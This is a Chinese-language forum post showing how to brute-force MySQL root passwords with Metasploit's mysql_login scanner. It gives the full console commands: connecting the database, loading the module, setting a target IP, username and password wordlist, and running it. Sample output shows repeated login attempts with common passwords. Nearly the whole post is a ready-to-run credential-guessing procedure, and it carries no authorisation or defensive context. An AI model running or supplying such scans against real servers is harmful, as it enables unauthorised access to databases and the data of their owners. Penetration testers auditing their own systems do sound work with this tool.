alibabamama 发表于 2018-9-29 13:57:51

Metasploit扫描Mysql弱口令

  msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.ymlmsf连接数据库
  
[*] Rebuilding the module cache in the background...
  msf > db_status   查看数据库连接状态
  
[*] postgresql connected to msf3
  msf > use auxiliary/scanner/mysql/mysql_login   加载扫描模块
  msf auxiliary(mysql_login) > set RHOSTS 1.5.5.3   目标IP地址
  RHOSTS => 1.5.5.3
  msf auxiliary(mysql_login) > set USERNAME root    目标用户名 一般为root
  USERNAME => root
  msf auxiliary(mysql_login) > set
  PASS_FILE/pen/msf3/data/wordlists/postgres_default_pass.txt   密码字典路劲,路劲随意填写
  PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt
  msf auxiliary(mysql_login) > exploit      开始扫描
  
[*] 1.5.5.3:3306 MYSQL – Found remote MySQL version 5.5.16
  
[*] 1.5.5.3:3306 MYSQL – – Trying username:’root’ with password:”
  
[*] 1.5.5.3:3306 MYSQL – – failed to login as ‘root’ with password ”
  
[*] 1.5.5.3:3306 MYSQL – – Trying username:’root’ with password:’root’
  
[*] 1.5.5.3:3306 MYSQL – – failed to login as ‘root’ with password ‘root’
  
[*] 1.5.5.3:3306 MYSQL – – Trying username:’root’ with password:’tiger’
  
[*] 1.5.5.3:3306 MYSQL – – failed to login as ‘root’ with password ‘tiger’
  
[*] 1.5.5.3:3306 MYSQL – – Trying username:’root’ with password:’postgres’
  能否扫描出来主要看密码字典

页: [1]
查看完整版本: Metasploit扫描Mysql弱口令